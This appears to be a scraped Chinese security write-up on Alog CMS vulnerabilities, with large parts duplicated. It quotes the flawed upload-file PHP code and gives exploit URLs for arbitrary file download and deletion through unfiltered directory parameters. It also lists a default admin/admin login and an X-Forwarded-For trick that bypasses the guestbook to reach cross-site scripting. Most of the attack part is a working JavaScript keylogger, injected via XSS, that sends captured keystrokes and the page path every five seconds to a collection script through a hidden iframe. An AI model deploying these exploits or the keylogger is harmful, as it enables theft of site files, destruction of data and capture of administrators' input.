后台 任意下载 任意删除 任意列目录
漏洞 文件:admin/mod/uploadfile.mod.php
$baseDir = SITE_ROOT.'static/upload/';
$currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : ''); //没有任何过滤
$currentPath = $baseDir.$currentDir;
任意 下载
$uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$_GET['uploadfile'] : $currentPath;
//$_GET['uploadfile']文件名称没有经常任何安全过滤
if (@is_file($uploadfile)) //如果文件存在即刻下载
{
$fileName = basename($uploadfile);
$fileNameInfo = explode('.', $fileName);
$fileType = $filename_info[count($fileNameInfo) - 1];
header('Content-type: application/x-'.$fileType);
header('Content-Disposition: attachment; filename='.$fileName);
header('Content-Description: PHP 3 Generated Data');
readfile($uploadfile);
exit;
}
EXP
http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/admin&uploadfile=index.php
http://HdhCmsTest2cto测试数据 /upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/2.php
http://localhost/upload/admin/index.php?m=login&a=login
http://localhost/upload/admin/index.php?m=login&a=login
userName=admin&password=admin&VCode=anqm&lang=zh-cn
遍历目录文件
留言板X-Forwarded-For 可以绕过导致跨站
Alog CMS
后台 任意下载 任意删除 任意列目录
漏洞文件:admin/mod/uploadfile.mod.php
$baseDir = SITE_ROOT.'static/upload/';
$currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : ''); //没有任何过滤
$currentPath = $baseDir.$currentDir;
任意下载
$uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$_GET['uploadfile'] : $currentPath;
//$_GET['uploadfile']文件名称没有经常任何安全过滤
if (@is_file($uploadfile)) //如果文件存在即刻下载
{
$fileName = basename($uploadfile);
$fileNameInfo = explode('.', $fileName);
$fileType = $filename_info[count($fileNameInfo) - 1];
header('Content-type: application/x-'.$fileType);
header('Content-Disposition: attachment; filename='.$fileName);
header('Content-Description: PHP3 Generated Data');
readfile($uploadfile);
exit;
}
EXP
http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/admin&uploadfile=index.php
http://localhost/upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/2.php
http://localhost/upload/admin/index.php?m=login&a=login
http://localhost/upload/admin/index.php?m=login&a=login
userName=admin&password=admin&VCode=anqm&lang=zh-cn
遍历目录文件
留言板X-Forwarded-For 可以绕过导致跨站
跨站协助删除后台文件
获取后台路径监视输入字符
1.js
var keys; //保存键盘记录
var key;
document.onkeypress = function(e) { //劫持键盘消息函数
get = window.event ? event:e;//创建事件对象
key = get.keyCode ? get.keyCode : get.charCode;
switch(key){
case 32 : key = '[Space]';break;
case 13 : key = '[Enter]';break;
default :
key = String.fromCharCode(key);
keys += key;
//alert(key+"||"+keys);
}
跨站协助删除后台文件
获取后台路径监视输入字符
1.js
var keys; //保存键盘记录
var key;
document.onkeypress = function(e) { //劫持键盘消息函数
get = window.event ? event:e;//创建事件对象
key = get.keyCode ? get.keyCode : get.charCode;
switch(key){
case 32 : key = '[Space]';break;
case 13 : key = '[Enter]';break;
default :
key = String.fromCharCode(key);
keys += key;
//alert(key+"||"+keys);
}
}
function f()
{
$url=escape(window.location.pathname);
ifm=document.createElement("IFRAME");
document.body.appendChild(ifm);
ifm.width=0;
ifm.height=0;
ifm.src="http://localhost/upload/7.php?x="+$url+"//"+keys;
}
window.setInterval(f,5000)
//setTimeout(f,"1000");
查看更多关于Alog CMS系统XSS任意文件下载读取漏洞 - 网站安全的详细内容...